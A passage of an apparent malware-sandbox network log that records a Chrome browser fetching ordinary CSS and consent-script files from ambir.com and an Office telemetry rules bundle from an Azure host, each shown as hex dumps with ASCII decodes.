                                                                                                                                                                                              Data Ascii: c4c4c;\n bottom: 0;\n padding: 20px;\n position: fixed;\n text-align: center;\n width: 100%;\n z-index: 30;\n}\n#" + id + " .st-close {\n " + (st.BORDER_RADIUS(28)) + "\n " + st.BORDER_BOX + "\n background: #999;\n bottom: 28px;\n color: #fff;\
                                                                                                                                                                                              2024-11-20 20:28:16 UTC2410INData Raw: 69 6f 6e 20 26 26 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 20 7c 7c 20 27 27 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 61 72 74 73 20 3d 20 68 6f 73 74 2e 73 70 6c 69 74 28 27 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 70 61 72 74 73 2e 6c 65 6e 67 74 68 20 3e 20 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 20 3d 20 22 64 6f 6d 61 69 6e 3d 2e 22 20 2b 20 70 61 72 74 73 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 61 6d 65 73 69 74 65 5f 73 65 63 75 72 65 20 3d 20 22 22 3b 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: ion && window.location.hostname) || ''; var parts = host.split('.'); var domain = ""; if (parts.length > 1) { domain = "domain=." + parts.slice(-2).join('.'); } var samesite_secure = "";
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 74 20 77 65 20 74 72 79 20 74 6f 20 67 65 74 20 74 68 65 20 64 61 74 61 20 66 72 6f 6d 20 74 68 65 20 63 6d 70 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 77 72 61 70 20 69 6e 20 61 20 74 72 79 20 63 61 74 63 68 20 73 69 6e 63 65 20 77 65 20 64 6f 6e 27 74 20 63 6f 6e 74 72 6f 6c 20 74 68 65 20 74 63 66 61 70 69 20 63 6f 64 65 20 6f 6e 20 70 61 67 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 74 63 66 61 70 69 5f 63 61 6c 6c 62 61 63 6b 20 3d 20 28 64 61 74 61 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 61 74 61 20 26 26 20 64 61 74 61 2e 74 63 53 74 72 69 6e 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72
                                                                                                                                                                                              Data Ascii: t we try to get the data from the cmp // wrap in a try catch since we don't control the tcfapi code on page try { const tcfapi_callback = (data) => { if (data && data.tcString) { var


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              9192.168.2.549723141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:15 UTC581OUTGET /wp-content/themes/ambir/css/owl.carousel.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:16 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-1288"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13803
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f76fe217cab-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:16 UTC892INData Raw: 31 32 38 38 0d 0a 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 2f 2a 0a 20 2a 20 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 2d 20 43 6f 72 65 0a 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 2d
                                                                                                                                                                                              Data Ascii: 1288/** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE *//* * Owl Carousel - Core */.owl-carousel { display: none; width: 100%; -
                                                                                                                                                                                              2024-11-20 20:28:16 UTC1369INData Raw: 72 61 6e 73 6c 61 74 65 33 64 28 30 70 78 2c 20 30 70 78 2c 20 30 70 78 29 3b 20 7d 0a 20 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 2c 0a 20 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 2d 6d 73 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 30 2c 20 30 29 3b 0a 20 20 20 20 2d 6d 6f
                                                                                                                                                                                              Data Ascii: ranslate3d(0px, 0px, 0px); } .owl-carousel .owl-wrapper, .owl-carousel .owl-item { -webkit-backface-visibility: hidden; -moz-backface-visibility: hidden; -ms-backface-visibility: hidden; -webkit-transform: translate3d(0, 0, 0); -mo
                                                                                                                                                                                              2024-11-20 20:28:16 UTC1369INData Raw: 61 72 6f 75 73 65 6c 2e 6f 77 6c 2d 72 65 66 72 65 73 68 20 2e 6f 77 6c 2d 69 74 65 6d 20 7b 0a 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 20 7d 0a 20 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2e 6f 77 6c 2d 64 72 61 67 20 2e 6f 77 6c 2d 69 74 65 6d 20 7b 0a 20 20 20 20 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 70 61 6e 2d 79 3b 0a 20 20 20 20 20 20 20 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 70 61 6e 2d 79 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 75 73 65 72 2d 73 65 6c 65 63 74 3a
                                                                                                                                                                                              Data Ascii: arousel.owl-refresh .owl-item { visibility: hidden; } .owl-carousel.owl-drag .owl-item { -ms-touch-action: pan-y; touch-action: pan-y; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select:
                                                                                                                                                                                              2024-11-20 20:28:16 UTC1122INData Raw: 77 6c 2d 69 74 65 6d 20 2e 6f 77 6c 2d 6c 61 7a 79 3a 6e 6f 74 28 5b 73 72 63 5d 29 20 7b 0a 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 3b 20 7d 0a 20 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 69 6d 67 2e 6f 77 6c 2d 6c 61 7a 79 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 73 74 79 6c 65 3a 20 70 72 65 73 65 72 76 65 2d 33 64 3b 20 7d 0a 0a 2f 2a 0a 20 2a 20 09 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 2d 20 56 69 64 65 6f 20 50 6c 75 67 69 6e 0a 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                                                              Data Ascii: wl-item .owl-lazy:not([src]) { max-height: 0; } .owl-carousel .owl-item img.owl-lazy { transform-style: preserve-3d; }/* * Owl Carousel - Video Plugin */.owl-carousel .owl-video-wrapper { position: relative; height: 100%; background:
                                                                                                                                                                                              2024-11-20 20:28:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              10192.168.2.54971913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:15 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:16 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                                              ETag: "0x8DD08B87243495C"
                                                                                                                                                                                              x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202815Z-185f5d8b95c4vwv8hC1NYCy4v40000000ay0000000007m64
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:16 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                              2024-11-20 20:28:16 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              11192.168.2.549725141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:16 UTC583OUTGET /wp-content/themes/ambir/style.css?v=1732127239 HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:17 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:16 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
